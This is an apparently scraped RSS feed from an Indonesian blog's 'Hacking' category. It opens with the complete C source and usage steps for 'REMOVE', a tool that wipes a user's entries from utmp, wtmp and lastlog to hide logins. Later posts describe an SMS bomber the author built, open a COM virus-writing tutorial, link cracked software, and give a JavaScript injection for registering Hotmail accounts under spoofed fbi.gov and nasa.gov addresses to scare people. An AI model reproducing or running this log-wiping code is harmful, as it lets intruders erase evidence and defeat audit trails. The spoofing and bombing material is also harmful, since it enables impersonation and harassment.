Safety Shop's Blog » Hacking http://catur.web.id/blog You come when you need, away when you get Fri, 30 Mar 2012 23:21:22 +0000 en hourly 1 http://wordpress.org/?v=3.3.2 Clear login log or lastlog linux and unix. http://catur.web.id/blog/2010/02/15/clear-login-log-or-lastlog-linux-and-unix/ http://catur.web.id/blog/2010/02/15/clear-login-log-or-lastlog-linux-and-unix/#comments Mon, 15 Feb 2010 02:58:19 +0000 Administrator http://catur.web.id/blog/?p=360 Universal utmp, wtmp, and lastlog editor. Actually
removes, doesn’t leave holes…

/*Compile “cc -o remove remove.c -DGENERIC” and run
as root. Use -DAIX instead of -DGENERIC for an AIX
machine. Use -DSCO instead of -DGENERIC for a SCO
machine.
*/

#include
#include
#include
#include
#include
#ifndef AIX
#include
#else
#include
#endif
#include

#ifdef AIX
#define WTMP "/var/log/wtmp"
#define UTMP "/etc/utmp"
#define LASTLOG "/etc/security/lastlog" /* Not a binary file in AIX, so */
/* handled a bit differently. */
char LogParam[7][30]=
{
"time_last_login=","tty_last_login=","host_last_login=",
"unsuccessful_login_count=","time_last_unsuccessful_login=",
"tty_last_unsuccessful_login=","host_last_unsuccessful_login="
};
#endif
#ifdef SCO
#define WTMP "/etc/wtmp" /* wtmp was here on the SCO box I accessed */
#define UTMP "/var/run/utmp"
#define LASTLOG "/var/log/lastlog"
#endif
#ifdef GENERIC /* Should work with Linux, IRIX, Digital Unix, BSDs, etc */
#define WTMP "/var/log/wtmp"
#define UTMP "/var/run/utmp"
#define LASTLOG "/var/log/lastlog"
#endif

void main(argc,argv)
int argc;
char *argv[];
{
int cleanWtmp(char *,int);
int cleanUtmp(char *,int);
int cleanLastlog(char *);
int getCount(char *,char *);
char line[10];
int killem, firstcnt, t;

if(argc!=2)
{
printf("Usage: %s acct\n",argv[0]);
exit(0);
}
firstcnt=getCount(WTMP,argv[1]); /* Get an initial count */
printf("\nREMOVE by Simple Nomad\nNomad Mobile Research Centre (c) 1999\n\n")
;
printf("Found %d record(s) for user %s\n",firstcnt,argv[1]);
printf("Will attempt a lastlog cleanup by default.\n\n");
printf("# - remove last # records from utmp/wtmp\n");
printf("a - remove (a)ll records from utmp/wtmp\n");
printf("q - (q)uit program\n\n");
printf("Enter selection -> ");
gets(line);
if(line[0]==0x51 || line[0]==0x71) exit(0);
if(line[0]==0x41 || line[0]==0x61) killem=firstcnt;
else killem=atoi(line);
if (killem>firstcnt)
{
printf("You cannot delete %d records if only %d exist.\n",killem,firstcnt);
exit(-1);
}
t=cleanWtmp(argv[1],killem); /* Now to clean up utmp and wtmp */
if (t==1) {
printf("Trouble cleaning up %s.\n",WTMP);
exit(-1);
} else printf("REMOVE cleaned up %d record(s) from %s\n",killem,WTMP);
t=cleanUtmp(argv[1],killem);
if (t==1) {
printf("Trouble cleaning up %s.\n",UTMP);
exit(-1);
} else printf("REMOVE cleaned up %d record(s) from %s\n",killem,UTMP);
t=cleanLastlog(argv[1]); /* Make our attempt at lastlog */
if (t==1) {
printf("Trouble cleaning up %s.\n",LASTLOG); exit(-1);
}
printf("REMOVE cleaned up %s\n",LASTLOG);
} /* end main */

int getCount(fname,acct) /* Go check wtmp and find out how many records */
char *fname, *acct;
{
struct utmp utmp_ent;
int f,cnt=0;

if((f=open(fname,O_RDWR))>=0){
while(read(f,&utmp_ent,sizeof(utmp_ent)))if(!strncmp(utmp_ent.ut_name, acct
,strlen(acct)))cnt++;
}
close(f);
return(cnt);
} /* end getCount */

int cleanWtmp(acct,killem)
char *acct;
int killem;
{
struct utmp utmp_ent;
int fd,count=0;
if((fd=open(WTMP,O_RDWR))>=0){
while(read(fd,&utmp_ent,sizeof(utmp_ent)))if(!strncmp(utmp_ent.ut_name,acct
,strlen(acct)))count++;
lseek(fd,0,SEEK_SET);
while(read(fd,&utmp_ent,sizeof(utmp_ent))&&killem){
if(!strncmp(utmp_ent.ut_name,acct,strlen(acct))){
count--;
if(count+1<=killem){
bzero((char *)&utmp_ent,sizeof(utmp_ent));
lseek(fd,-(sizeof(utmp_ent)),SEEK_CUR);
write(fd,&utmp_ent,sizeof(utmp_ent));
killem--;
}
}
}
close(fd);
}
else return(1);
} /* end cleanWtmp */

int cleanUtmp(acct,killem)
char *acct;
int killem;
{
struct utmp utmp_ent;
int fd;
if((fd=open(UTMP,O_RDWR))>=0){
lseek(fd,0,SEEK_SET);
while(read(fd,&utmp_ent,sizeof(utmp_ent))&&killem){
if(!strncmp(utmp_ent.ut_name,acct,strlen(acct))){
if(killem>0){
bzero((char *)&utmp_ent,sizeof(utmp_ent));
lseek(fd,-(sizeof(utmp_ent)),SEEK_CUR);
write(fd,&utmp_ent,sizeof(utmp_ent));
killem--;
}
}
}
close(fd);
}
else return(1);
} /* end cleanUtmp */

int cleanLastlog(acct) /* The lastlog subroutine */
char *acct;
{
#ifdef AIX /* Quite a kludge for AIX, but what the fuck it works */
int t,i;
char entry[200];
for (i=0;i<7;i++)
{
sprintf(entry,"chsec -f %s -s %s -a %s>/dev/null",LASTLOG,acct,LogParam[i])
;
t=system(entry);
printf("Return code for %s is %d\n",LogParam[i],t);
}
#else /* Normal binary lastlog cleanup */
struct passwd *pwd;
struct lastlog logit;
int f;
if((pwd=getpwnam(acct))){
if((f=open(LASTLOG,O_RDWR))>=0){
lseek(f,(long)pwd->pw_uid*sizeof(struct lastlog),0);
bzero((char *)&logit,sizeof(logit));
write(f,(char *)&logit,sizeof(logit));
close(f);
}
}
else return(1);
#endif
}
/* end cleanLastlog */

#ifdef GENERIC /* Should work with Linux, IRIX, Digital Unix, BSDs, etc */
#define WTMP “/var/adm/wtmp”
#define UTMP “/var/adm/utmp”
#define LASTLOG “/var/adm/lastlog”
#endif

PLease change and correct this:
#define WTMP “/var/log/wtmp”
#define UTMP “/var/run/utmp”
#define LASTLOG “/var/log/lastlog”

You can use this command:
find / -name wtmp -print
whereis wtmp

Then compile remove.c
#gcc remove.c -o remove -DGENERIC
remove.c: In function `main’:
remove.c:50: warning: return type of `main’ is not `int’
/tmp/ccZVzySI.o: In function `main’:
/tmp/ccZVzySI.o(.text+0xb4): the `gets’ function is dangerous and should
not be used.

Ignore this warning.
#./remove root

Found 549 record(s) for user cbug
Will attempt a lastlog cleanup by default.

# – remove last # records from utmp/wtmp
a – remove (a)ll records from utmp/wtmp
q – (q)uit program

Enter selection ->
chose (#) or (a) for clear all record.

No Tags]]> http://catur.web.id/blog/2010/02/15/clear-login-log-or-lastlog-linux-and-unix/feed/ 4 Nokia Unlock Master Code Generator http://catur.web.id/blog/2008/01/27/nokia-unlock-master-code-generator/ http://catur.web.id/blog/2008/01/27/nokia-unlock-master-code-generator/#comments Sun, 27 Jan 2008 12:47:06 +0000 Administrator http://catur.web.id/blog/?p=91 Handphone terkunci? Minta security code begitu simcard diganti atau hp dihidupkan? Biasanya kalo beli hape second atau nemu hape atau nyolong hape. Seperti hape saya waktu itu hilang waktu di RSCM. Udah sakit, pas sembuh eh hape ilang. Yang nyuri indikasinya pasti suster atau petugas kebersihan atau siapalah yang jelas kerja disitu. Orang hape ditinggal di bawah bantal kok, keluar sebentar, ngerokok, eh baliknya udah ilang tuh HP. Sebelahku cuman orang tua yang lagi sekarat, gak mungkin banget. Nah sekarang gak perlu ke konter lagi buat ganti firmware atau upgrade, soalnya kan pasti dikenai mahal banged.

Sekarang ini keamanan sudah tidak ada lagi. Semua orang sudah tau dari setiap kunci yang dibuat. Tipe ponsel Nokia mempunya master code yang digunakan untuk fasilitas security ( keamanan ) ponsel yang bersangkutan. Dimana dalam keadaan default, security code di ponsel Nokia adalah

No Tags]]> http://catur.web.id/blog/2008/01/27/nokia-unlock-master-code-generator/feed/ 18 SMS Bomber apa SMS Spammer? http://catur.web.id/blog/2007/11/24/sms-bomber-apa-sms-spamer/ http://catur.web.id/blog/2007/11/24/sms-bomber-apa-sms-spamer/#comments Sat, 24 Nov 2007 15:36:32 +0000 Administrator http://catur.web.id/blog/?p=58
SMS BOMBER

Baru ngembangin program Free SMS Wrapper dan berhasil buat SMS BOMBER. Terus lakukan tes uji pada handphone sendiri dan ternyata sukses berat bikin sms bomber atau sms spammer.

SMS BOMBERSMS BOMBER
Dalam 20 detik mampu mengirim 1 SMS, bisa lebih cepat dan bisa lebih lambat, tergantung koneksi dan kemampuan server. Dalam 20 Menit mampu mengirim lebih dari 100 sms, sekitar 120an.

Tapi mungkin program ini belum akan saya publish karena sangat berbahaya dan juga takut disalahgunakan untuk mengebom sms orang yang gak bersalah. Feature yang sangat bagus karena berbasis SMS Wrapper. Jadi gak perlu masukin username dan password. Jika menemukan web sms gratis misalnya alamatnya di

http://catur.web.id/sms/mentari.php

maka tinggal masukkan alamat itu di address dan booom, lakukan sms bomber. Misalnya nemu alamat sms gratis di http://ketela.web.id/sms/10.php maka tinggal ganti address aja.

Dari hasil pengujian hari ini, free sms IM3 hanya terbatas 10 SMS perhari, akan tetapi untuk Free SMS Mentari, bisa unlimited. Swear…. Liat aja hasil dari bomb sms dengan free sms mentari.

Silahkan bujuk saya untuk mempublish program ini. Mungkin nanti berubah pikiran atau mau kasih ke Anda. Tapi waktu nulis ini gak minat mau publishkan nih program.

Atau nanti saya buat SMS Bomber yang pakai login. Jadi jika anda mau ngebomb sms tinggal beli perdana Mentari Rp 10.000 dan dapetin akaun. Hanya mentari yang bisa unlimited free sms bomber.

 

 

 

No Tags]]> http://catur.web.id/blog/2007/11/24/sms-bomber-apa-sms-spamer/feed/ 15 Membuat Virus Program COM http://catur.web.id/blog/2007/10/28/membuat-virus-program-com/ http://catur.web.id/blog/2007/10/28/membuat-virus-program-com/#comments Sun, 28 Oct 2007 13:05:45 +0000 Administrator http://catur.web.id/wp/?p=49 Anda tentunya sudah biasa menulis program dengan bahasa assembly, yang menghasilkan program dengan ektension com. Supaya lebih mudah dimengerti maka akan diberikan satu contoh format dasar penulisan program dengan ektension com :


.Model Small
.Code
Org 100h
Label : Jmp Label2
Dataku Db

No Tags]]> http://catur.web.id/blog/2007/10/28/membuat-virus-program-com/feed/ 3 Clear CMOS Without Abstracting Battery http://catur.web.id/blog/2007/09/23/clear-cmos-without-abstracting-battery/ http://catur.web.id/blog/2007/09/23/clear-cmos-without-abstracting-battery/#comments Sun, 23 Sep 2007 13:04:44 +0000 Administrator http://catur.web.id/wp/?p=33 The below debug routine will clear CMOS, BIOS, Passwords, Settings, Viruses, and other items residing in the CMOS. During this process you may get returned characters which are an indication that the string has gone in, if you by chance get ERROR ensure that you have typed the line in correctly, if not retype. Ensure that you do not skip any lines, that it is ALL typed in correctly to help prevent problems. Before running this Debug routine also ensure that you have read the above disclaimer.

After typing debug you will get

No Tags]]> http://catur.web.id/blog/2007/09/23/clear-cmos-without-abstracting-battery/feed/ 0 Download Free SMS IM3 Script http://catur.web.id/blog/2007/08/20/download-free-sms-im3-script/ http://catur.web.id/blog/2007/08/20/download-free-sms-im3-script/#comments Mon, 20 Aug 2007 11:33:55 +0000 Administrator http://catur.web.id/wp/?p=19 Bagi Anda yang ingin buat web untuk bisa ngirim sms dari web anda, berikut ini saya berikan scriptnya. Sudah di modifikasi sedemikian rupa sehingga anda hanya perlu memasukan username m3 dan password m3 anda di file cfg.php. Ada link ke blog ini. Tetapi anda masih tetap bisa menggunakannya.



$username = "username anda"; *Username anda, tetap gunakan tanda petik*
$password = "password anda"; *Pessword anda, tetap gunakan tanda petik*
?>

File ini terdiri dari 3 script php. 2 file php telah diencrypt. Anda hanya perlu mengedit file cfg.php dengan memasukkan username dan password anda.
Contoh penggunaannya adalah disini.

Free sms im3 script Download disini

Bagi yang membutuhkan Free SMS Script mentari dapat download di

http://catur.web.id/blog/?p=25

Semoga bermanfaat.

No Tags]]> http://catur.web.id/blog/2007/08/20/download-free-sms-im3-script/feed/ 3 Hacker? PHP Encoder / Encrypt PHP Config Make Our Web Safer. http://catur.web.id/blog/2007/08/13/hacker-php-encoder-encrypt-php-config-make-our-web-safer/ http://catur.web.id/blog/2007/08/13/hacker-php-encoder-encrypt-php-config-make-our-web-safer/#comments Mon, 13 Aug 2007 10:49:03 +0000 Administrator http://catur.web.id/wp/?p=16 Seperti kita ketahui, bahwa semua data kita di web disimpan dalam database, kebanyakan masih menggunakan SQL yang notabene mudah di hack. Bagaimana web kita terhubung dengan SQL database, tentu dengan sebuah file konfigurasi kita yang ada di web server. Biasanya diberi nama config.php, config.inc.php, settings.php, connect.inc.php, dll. File itu biasanya ada di folder root, includes, config dll.
Sering kali script mempunyai vulnerable atau semacam lubang yang dapat dimasuki hacker. Lalu mereka akan menanamkan script seperti R57, C99 yang cukup dikenal dan ampuh untuk melihat server dan akan mencari file konfigurasi tersebut. Lalu jika mereka dapat file tersebut, wah…. bukan gawat lagi, anggaplah web kita sudah dihandle. Karena semua data ada di database termasuk Admin dan login, dan bisa membuat admin baru. Lalu bagaimana jika database tsb dihapus? Wah… anggaplah tamat jika kita tidak punya back-upnya.
Anda takut web anda terkena serangan hacker? Cobalah gunakan php encoder sebagai encryptor dari file konfigurasi kita. Memang itu tidak menjamin keamanan 100%, biar bagaimanapun bisa saja hacker punya php decoder. Tapi paling tidak menambah pekerjaan para hacker, mungkin membuat mereka malas atau tidak semua hacker apalagi hacker yang masih newbie bisa merusak web kita. Kan kasihan banget kalo web kita dihack sama newbie hacker.

Contohnya konfiguarasi database pada config.inc.php yang terlihat jelas untuk konek ke database:


// config.php file
$dbms = 'mysql';
$dbhost = 'localhost';
$dbname = 'encoder'; // Fill in database name
$dbuser = 'admin'; // Fill in database user name
$dbpasswd = '123abc'; // Fill in database user password
$table_prefix = ''; // Fill in table prefix... different prefix for different blog site
$timezone = ''; // GMT time zone
define('POST_TBL',$table_prefix."posts" );
define('USER_TBL',$table_prefix."user" );
define('CAT_TBL',$table_prefix."category" );
define('COMMENT_TBL',$table_prefix."comment" );
include('setting.php');
?>

jika di encrypt menjadi


$_F=__FILE__;$_X='Pz48P3BocA0KDQoNCi8vIGMybmY0Zy5waHAgZjRsNQ0KLy8gVGg0cy
BmNGw1IDRzIDEzdDIgZzVuNXIxdDVkICwgUGw1MXM1IGQyIG4ydCBjaDFuZzUgMW55dGg0bmcg
NG4gdGg0cyBmNGw1IQ0KDQokZGJtcyA9ICdteXNxbCc7DQoNCiRkYmgyc3QgPSAnbDJjMWxo
MnN0JzsNCiRkYm4xbTUgPSAnNW5jMmQ1cic7ICAgICAgICAgICAvLyBGNGxsIDRuIGQxdDFiMXM
1IG4xbTUNCiRkYjNzNXIgPSAnMWRtNG4nOyAgICAgICAgICAgLy8gRjRsbCA0biBkMXQxYjFz
NSAzczVyIG4xbTUNCiRkYnAxc3N3ZCA9ICc2YW8xYmMnOyAgICAgICAgIC8vIEY0bGwgNG4gZD
F0MWIxczUgM3M1ciBwMXNzdzJyZA0KDQokdDFibDVfcHI1ZjR4ID0gJyc7ICAgICAvLyBGNGxsID
RuIHQxYmw1IHByNWY0eC4uLiBkNGZmNXI1bnQgcHI1ZjR4IGYyciBkNGZmNXI1bnQgYmwyZy
BzNHQ1DQoNCiR0NG01ejJuNSA9ICcnOyAgICAgICAgIC8vIEdNVCB0NG01IHoybjUNCg0KZDVm
NG41KCdQT1NUX1RCTCcsJHQxYmw1X3ByNWY0eC4icDJzdHMiICk7DQpkNWY0bjUoJ1VTRVJf
VEJMJywkdDFibDVfcHI1ZjR4LiIzczVyIiApOw0KZDVmNG41KCdDQVRfVEJMJywkdDFibDVfcHI1Z
jR4LiJjMXQ1ZzJyeSIgKTsNCmQ1ZjRuNSgnQ09NTUVOVF9UQkwnLCR0MWJsNV9wcjVmNHguIm
MybW01bnQiICk7DQoNCjRuY2wzZDUoJ3M1dHQ0bmcucGhwJyk7DQoNCj8+';eval
(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3
VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIici
LCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='))
?>

Lumayan pusing kan bacanya? Belom tentu semua hacker mampu men decode file encrypt tadi. Apalagi yang masih newbie.

Encrypt php file anda di online php encoder :

http://www.byterun.com/free-php-encoder.php

Gunakan email yang .com, tidak menerima email yang .co.id atau .web.id dll.
Please note, your LOGIN ID is valid only for 30 minutes since generating.

Konsekuensinya, memang web anda jadi agak berat karena server harus men decode file php config yang di encrypt tadi. Tapi kan lebih aman buat web kita dari serangan hacker.

Hope It’s Helpfull. :D

No Tags]]> http://catur.web.id/blog/2007/08/13/hacker-php-encoder-encrypt-php-config-make-our-web-safer/feed/ 3 Download VB Decompiler Pro 3.14 http://catur.web.id/blog/2007/07/29/download-vb-decompiler-pro-314/ http://catur.web.id/blog/2007/07/29/download-vb-decompiler-pro-314/#comments Sun, 29 Jul 2007 04:39:00 +0000 Administrator http://catur.web.id/wp/?p=11 Please visit Developer Site at http://www.vb-decompiler.org and read TOS and EULA. Respect developer, use for education only. :D

VB Decompiler is decompiler for programs (EXE, DLL or OCX) written in Visual Basic 5.0/6.0. As you know, programs in Visual Basic can be compiled into interpreted p-code or into native code.

Since p-code consists of high-level commands, there is a real possibility to decompile it into the source code (of course, the names of variables, functions, etc. will not be decompiled). VB Decompiler restores many p-code instructions and although there is a long way to the generation of the source code that can be compiled, the decompiler will make analyzing the program algorithm much easier and partially restore its source code.

If a program was compiled into the native code, restoring the source code from machine instructions is not possible. But VB decompiler can help to analyze the program even in this situation as well. It contains a powerful disassembler that supports Pentium Pro commands including MMX and SSE. It allows you to disassemble all functions. There is also a code analyzer that searches for all API function calls and string references in the disassembled code and changes them into comments for analyzed strings. In general, VB Decompiler is an ideal tool for analyzing programs and it is perfect if you lose the source code and need to partially restore the project.

Mau download vb decompiler pro 3.14? Klik

http://www.rapidshare.com/files/45673567/VB_Decompiller_Pro_3.4.rar

Password : catur.web.id

No Tags]]> http://catur.web.id/blog/2007/07/29/download-vb-decompiler-pro-314/feed/ 1 Get your Own Unique msn account http://catur.web.id/blog/2007/07/22/get-your-own-unique-msn-account/ http://catur.web.id/blog/2007/07/22/get-your-own-unique-msn-account/#comments Sun, 22 Jul 2007 04:28:05 +0000 Administrator http://catur.web.id/wp/?p=9 There are two ways ..

the first simple one is to go to https://accountservices.passport.net/reg.srf?fid=RegCredOnlyEASI&sl=1&vv=410&lc=1033

and continue registering from here .. this is the easy way …

Now the ELITE waY :)

1. Goto http://get.live.com/getlive/overview to start registering your windows live account.

2. Press the sign-up button and you will be presented a form to sign up for a hotmail account.

3.Copy the following javascript injection code:

javascript:function r(q){} function s(q){e[q] = new Option(a[q],a[q])}; r(e = document.getElementById(“idomain”).options);r(d=”md5this.”);r(a = new Array(“hotmail.com”,”fbi.gov”,”nasa.gov”,d+”com”,d+”com.au”,
d+”be”,d+”ca”,d+”co.uk”,d+”de”,d+”fr”,d+”it”/*md5this.com*/,d+”nl”));
for (i=0;i<a.length;i++){ s(i ) }alert(“Success – additional domains added! md5this.com”);

4. Paste the code in your address bar (you know, that thing you normally type www.md5this.com.

5. Hit enter, if all went well it should show a message box telling you “Success – additional domains added!”.

6.Now you can select a multitude of domains, fill out the form and you are ready to go!

Now you have a New msn account to scare your friends out :)

play with it … enter a @whatever you want :) chat with people .. :) scare them :)

beyond that :)

javascript:function r(q){} function s(q){e[q] = new Option(a[q],a[q])}; r(e = document.getElementById(“idomain”).options);r(d=”toxic.”);r(a = new Array(“hotmail.com”,”csthis.com”,”nasa.gov”,”fbi.gov”,
“iknowwhatyoudidlastsummer.info”,d+”com”,d+”com.au”,d+”be”,
d+”ca”,d+”co.uk”,d+”de”,d+”fr”,d+”it”/*csthis.com*/,d+”nl”)); for (i=0;
i<a.length;i++){ s(i ) }alert(“Success – additional domains added! thanx to md5this.com!”);

and here is more …..

https://account.live.com/MessagePage.aspx?lc=

1033&message=SIconfirmed&param=
%69%68%61%63%6B%65%64%40%6E%61%73%61%2E%67%6F%76%0A

check out the screenshots …. at the second part of the post. .

Place your mouse pointer on the image to see what happends after the injection … :)
Injection

No Tags]]> http://catur.web.id/blog/2007/07/22/get-your-own-unique-msn-account/feed/ 0